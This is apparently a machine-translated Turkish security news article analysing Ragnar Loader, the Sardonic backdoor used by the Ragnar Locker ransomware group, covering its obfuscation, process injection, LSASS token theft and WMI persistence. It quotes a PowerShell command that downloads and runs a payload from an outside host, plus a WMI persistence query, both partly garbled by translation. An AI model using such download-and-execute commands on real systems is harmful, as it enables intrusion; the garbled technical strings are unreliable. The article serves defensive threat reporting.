Ragnar Loader olarak bilinen gelişmiş bir kötü amaçlı yazılım araç seti, hedeflenen fidye yazılımı saldırılarında kritik bir bileşen olarak tanımlanmıştır.
Sardonic arka kapı olarak da bilinen yükleyici, 2020’de ortaya çıkmasından bu yana organizasyonlara saldıran Ragnar Locker olarak bilinen korkunç Mantis Fidye Yazılımı Grubu için birincil sızma mekanizması olarak hizmet vermektedir.
Güvenlik araştırmacıları, Ragnar Loader’ın birincil işlevinin tehlikeye atılan sistemlere kalıcı erişim oluşturmak ve sürdürmek olduğunu belirlemiştir.
.webp)
Dağıtım yapıldıktan sonra, kötü amaçlı yazılım, tehdit aktörlerinin hedefli ortamlarda uzun vadeli dayanakları korumalarını sağlayarak genişletilmiş kötü amaçlı işlemleri kolaylaştırır.
Araç seti, çok katmanlı şaşkınlık, dinamik şifre çözme rutinleri ve geleneksel güvenlik savunmalarında önemli zorluklar yaratan sofistike kalıcılık mekanizmaları kullanır.
Catalyst araştırmacılarının analizi, Ragnar Loader’ın yürütme için PowerShell tabanlı yükleri kullandığını ve işlemlerini gizlemek için RC4 ve Base64 dahil güçlü şifreleme ve kodlama yöntemlerini içerdiğini ortaya koyuyor.
Kötü amaçlı yazılım, uzlaşmış sistemler üzerinde gizli kontrol oluşturmak için süreç enjeksiyon stratejileri kullanır.
Tipik bir enfeksiyon, “PowerShell.exe -Nop -ep Bypass -C IEX (new-nesne sistemi.net.webclient) .downloadString (‘https: // 104-238-34-209 gibi PowerShell komutlarıyla başlar.[.]nip[.]ilk yükü indiren ve yürüten io/4c8b09 ‘) ”.
Yükleyici genellikle birden çok bileşen içeren kapsamlı bir araç setinin parçası olarak dağıtılır: düğüm başlatma komut dosyası, döndürme dosyaları, uzak masaüstü protokol dosyaları ve uzaktan kod yürütme komut dosyaları.
Bu araçlar, fidye yazılım operatörlerine kurban ağlarında yanal hareket ve kalıcılık için geniş yetenekler sunar.
Kaçınma Teknikleri
Kötü amaçlı yazılımların teknik karmaşıklığı, çok aşamalı dağıtım sürecinde belirgindir.
.webp)
İlk yürütmeden sonra, Ragnar Loader bayt dizilerini önce bunları çözerek ve daha sonra RC4 şifre çözme uygulayarak şifresini çözer.
.webp)
Shellcode, XOR şifreleme süreçleri yoluyla kendi kendini değiştiren davranış sergiler.
Kalıcılık oluşturmak için, kötü amaçlı yazılım, belirli sistem yukarıda tetiklenen WMI filtreleri oluşturur, “InstancemodificationEvent’ten ISA Win32_Perfformatteddata_Perfos_System ve Targetinstance.SystemupTime> = 140 ve Targetinstance.SystemupTime> = 140 gibi sorguları kullanarak sorgular oluşturur.”
Bu sözde kalıcılık tekniği, kötü amaçlı yazılımların tehlikeye atılan sistemlerde tespit edilmemesine yardımcı olur.
.webp)
Yükleyici, yükünü, ayrıcalıkları yükseltmek için lSass.exe’den jetonları çaldıktan sonra, özellikle wMiprvse.exe olmak üzere meşru pencereler süreçlerine enjekte eder.
Bu teknik, kötü amaçlı yazılımların meşru süreçlerin arkasına saklanırken genişletilmiş sistem erişimi ile çalışmasını sağlar.
Kurulduktan sonra, arka kapı komut ve kontrol sunucusundan DLL eklentileri yükleme, dosyaları okumak ve yazmak, kabuk kodunu yürütme ve etkileşimli oturumlar oluşturma işlevleri de dahil olmak üzere birden fazla komut alabilir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.